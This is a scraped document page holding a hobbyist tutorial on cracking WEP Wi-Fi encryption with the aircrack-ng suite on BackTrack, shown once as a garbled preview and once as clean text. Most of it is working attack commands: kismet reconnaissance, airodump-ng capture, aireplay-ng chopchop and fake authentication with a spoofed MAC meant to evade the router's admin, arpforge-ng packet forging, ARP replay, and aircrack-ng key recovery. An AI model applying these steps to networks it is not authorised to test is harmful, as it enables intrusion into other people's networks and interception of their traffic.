Wep Cracking Tutorial
9 pages

Wep Cracking Tutorial


Le téléchargement nécessite un accès à la bibliothèque YouScribe
Tout savoir sur nos offres
9 pages
Le téléchargement nécessite un accès à la bibliothèque YouScribe
Tout savoir sur nos offres


Wep C racking T utorial
Hi, i n t his t utorial i  w ill be  s howing y ou ho w t o c rack w ep w ithout a ny t raffic on t he ne twork.  
To us e t his t utorial y ou ne ed t o ha ve pa cket i njection w orking w ith y our w ireless c ard, ki smet, 
aircrack s uite, a rpforge a nd a  s mall a mount of L inux kno wledge (t o ope n k onsole a nd put  y our c ard 
into m onitor m ode)
For t his t utorial i  ha ve us e Ba ckTrack ( www.remote­e xploit.org) L inux di stribution a s i t c ontains a ll 
the pr ograms a nd w as e asy t o i nstall pa cket i njection f or m y dr iver.
My s et­up:
Dell Ins piron 1 300 w ith a n a theros w ireless c ard r unning ba cktrack (i  w ill r efer t o t his a s BT ), m y 
D­L ink D I­524 r outer w hich ha s a  1 28 Bi t e ncryption a nd no thing e lse c onnected w irelessly.
After y ou boo t i nto BT  (or a nyother di stro y our us ing) put  y our c ard i nto m onitor m ode.
start ki smet , w e w ill us e ki smet t o f ind out  t he i nformation w e w ill ne ed a bout t he A P w e w ish t o 
kismet w ill s how a ll t he w ireless A ccess P oints i n ra nge
I onl y ha ve 1 i n ra nge (c alled Cr ossover) but  y ou m ay ha ve m ore a round y ou.
press s  t hen b , t his w ill l et y ou s croll up a nd do wn t he l ist t ill y ou f ind t he A P y ou w ish t o c rack 
then pr ess e nter
this w ill gi ve y ou m ore i nformation a bout t he a ccess poi nt, m ake a  no te of t he na me of i t, t he 
channel i ts on a nd t he bs sid (y ou c ...



Publié par
Nombre de lectures 115
Langue English
Poids de l'ouvrage 2 Mo


Wep Cracking Tutorial
Hi, in this tutorial i will be showing you how to crack wep without any traffic on the network.
To use this tutorial you need to have packet injection working with your wireless card, kismet, aircrack suite, arpforge and a small amount of Linux knowledge (to open konsole and put your card into monitor mode)
For this tutorial i have use BackTrack (www.remote-exploit.org) Linux distribution as it contains all the programs and was easy to install packet injection for my driver.
My set-up:
Dell Inspiron 1300 with an atheros wireless card running backtrack (i will refer to this as BT), my D-Link DI-524 router which has a 128 Bit encryption and nothing else connected wirelessly.
After you boot into BT (or anyother distro your using) put your card into monitor mode.
start kismet , we will use kismet to find out the information we will need about the AP we wish to hack
kismet will show all the wireless Access Points in range
I only have 1 in range (called Crossover) but you may have more around you.
press s then b , this will let you scroll up and down the list till you find the AP you wish to crack then press enter
this will give you more information about the access point, make a note of the name of it, the channel its on and the bssid (you can leave kismet open and just come back to it later to get the info) and also make sure its wep as this tutorial is for wep )
we will now run airodump to capture the IV's (data) we will need to crack the wep.
open a new konsole and run "airodump-ng" , this will show you all the possible options you can use with this application,
we only need to capture so we will use the -w , this is what we will call the file we are capturing and -c to specify a channel, this will make it easier for us to capture the data from our AP.
im going to call my file "weptutorial" and my channel (the channel kismet shows) is 8 so my command is. we will also need to add the interface to use at the end of the command, iwconfig can show this but hopefully you know, mine is ath1
here is the command i will use:
airodump-ng -w weptutorial -c 8 ath1
we should see our AP come up and we might have some traffic on it we might not.
i don't have any data on mine (as i have no wireless devices connected to it)
Now we are capturing data, we will need about 200 000 to 1 000 000 of these to crack wep.
while that's running open a new konsole and now we will speed up the traffic (if you have wireless devices and the data is going up fast enough then you dont need to do this stage)
we will now set up a method called chopchop, this is in aireplay-ng (run "aireplay-ng" like we did airodump-ng to see all the options) and it will capture and data and resend it over and over to make the traffic on the network so we can capture more.
the command to do this is:
aireplay-ng --chopchop -b 00:0F:3D:3D:94:72 ath1
aireplay-ng --chopchop -b 00:0F:3D:3D:94:72 shows it) ath1
= the program name = the attack we are useing = our AP's MAC address (kismet has this info and airosump also
= our network interface
aireplay will keep reading packets till it finds one that it thinks contains an IV (data containing the wep) . If your network hs wireless traffic on it then you should get one soon, if not ( like me) then we can fake authentication with AP and hopefully it will throw a packet or 2 out that we can catch.
to do this we open another konsole and use the aireplay-ng command again but a different attack method
aireplay-ng --fakeauth 50 -e Crossover -a -00:0F:3D:3D:94:72 -h 11:22:33:44:55:66 ath1
aireplay-ng = the program name --fakeauth 50 = the attack we are using with the delay of 50 -e Crossover = the name of the AP -a -00:0F:3D:3D:94:72 = our AP's MAC address -h 11:22:33:44:55:66 = a fake mac address for us to attack from so the routers admin cant see our real mac address ath1 = our network interface
we should see Sending Authentication Request Authentication successful
after a while the attack will stop but just re-run the command again
airodump will also show our new fake mac is connected to the ap
Hopefully the chopchop method we started will now catch some data press y to let it send it, it will do something like this screenshot
you will notice airodump has gone crazy too and lots of clients connected to the AP
let it run its magic till the chopchop hits 100%
now we have a cap and xor file, we will turn this into a file we can send back to the AP.
to do this run an app called arpforge-ng
this will edit the capture slightly, im not going to go into detail about this app.
arpforge-ng replay_dec-0831-173203.xor 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 arp.cap
arpforge-ng replay_dec-0831-173203.xor will be slightly different 1 00:0F:3D:3D:94:72 11:22:33:44:55:66
= the program name = the xor file that was caught by the chopchop method, yours
= the type we are using = the AP's mac address = our fake mac = the ip source, this can be anything arp.cap
after this it will say done.
= the destination , this is the AP's ip = the new capture file name
we will now send this modified capture file lots of times, and very fast, this will make the data in airodump go up.
aireplay-ng --interactive -r arp.cap ath1
press y when it asks if you want to send this packet
the data in airodump should now be rising very fast
at this stage you can stop the fake auth with ctrl+c. wait till you have about 100 000 before moving on (this may take a while) mine is doing about a hundred a second so make a brew.
when it hits around 100 000 we could start to crack the wep, we will leave the rest running and catching data so it will improve our chances.
Cracking Time
open a new konsole and run the command "aircrack-ng" to see all the possible options, we will only be using a few
aircrack-ng -a 1 -e Crossover -b 00:0F:3D:3D:94:72 weptutorial-02.cap
aircrack-ng -a 1 -e Crossover -b 00:0F:3D:3D:94:72 weptutorial-02.cap
= the program name = this is to choose what we are cracking 1 = wep, 2 = wpa-psk = the AP name = the ap mac address = this is the capture file that you called when you started airodump, it will prob add -01 to yours but as i already had one called that it made it -02, just use tab to find out or look in the folder
It is now testing your keys and hopefully this will find your key (this will also take time, make a sandwich)
remember , the higher the encryption the longer it can take.
if the aircrack fails just restart it and let it catch more data, for this tutorial i needed over 800 000
This key (ModShackHack1) took me 1 hour 20 mins to crack, some may take less time some may take more
Hope You Crack Your WEP -------------McScruff
  • Accueil Accueil
  • Univers Univers
  • Ebooks Ebooks
  • Livres audio Livres audio
  • Presse Presse
  • BD BD
  • Documents Documents